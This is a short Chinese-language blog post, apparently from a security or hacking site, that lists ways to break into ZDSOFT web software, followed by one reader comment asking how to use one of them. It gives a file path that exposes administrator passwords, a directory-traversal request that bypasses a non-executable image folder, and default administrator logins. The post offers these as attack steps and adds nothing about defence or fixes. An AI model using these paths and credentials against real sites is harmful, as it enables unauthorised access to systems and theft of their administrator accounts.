ZDSOFT 漏洞

/images/database/admin.xml
可以看到管理用户账户密码
editor/dialog/selectPageBg.aspx?position=&directory=..
变量directory是路径,..表示跟目录,绕过Image目录无执行权限
后台默认密码:zdsoft 123 zdsoft admin

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录

  • 1 Responses to “ZDSOFT 漏洞”
    • 1B

      editor/dialog/selectPageBg.aspx?position=&directory=..这个怎么利用呢? :roll: